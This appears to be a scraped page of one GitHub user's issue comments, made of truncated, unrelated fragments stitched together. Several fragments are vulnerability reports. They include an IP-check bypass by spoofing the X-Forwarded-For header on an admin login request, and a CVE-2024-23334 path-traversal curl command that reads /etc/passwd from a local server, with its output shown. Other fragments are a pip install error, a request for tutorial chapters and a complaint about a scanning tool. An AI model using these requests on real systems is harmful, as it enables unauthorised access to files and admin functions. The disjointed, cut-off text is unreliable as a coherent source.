小健健
小健健
/admin/themes/getTpl  丝毫没有过滤 
 
请求头添加了一个 `X-Forwarded-For: 127.0.0.2`   修复建议:禁用多级代理
注册的时候用户名填入`
登录添加X-Forward-IP头 ``` POST /admin/getLogin HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded;...
This can causes [CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334) ``` apple@MacBook-Pro ~ % curl --path-as-is "http://127.0.0.1:8888/static/../../../../../../../../../etc/passwd" ## # User Database # # Note that this file is consulted directly only when the system is running...
``` (venv) apple@MacBook-Pro chinese-pdf-ocr % pip3 install -r requirements.txt Collecting opencv-python==4.5.3.56 (from -r requirements.txt (line 1)) Using cached opencv-python-4.5.3.56.tar.gz (89.2 MB) Installing build dependencies ... error error: subprocess-exited-with-error × pip...
请问还有出6,7,8章的可能吗, 我觉得写的非常好, 很适合新手, 而且这三章的实战我觉得能学到很多. 如果能出的话, 非常感激
等着别人二开吗,没有批量我为什么不用手去网站点,而要敲一堆命令? 批量不应该是最核心的需求吗?没有批量这个工具的使用价值在哪里?为什么这种需求不放在第一位,第一版就出来? 为什么别人提issue,就当做没看见,这个需求是会被无视的吗? 我不理解,我不理解这是开发团队的问题,还是TideSec的问题,这样做开发真的不合格,谢谢。
and there is nothing but deleted the spacess it's done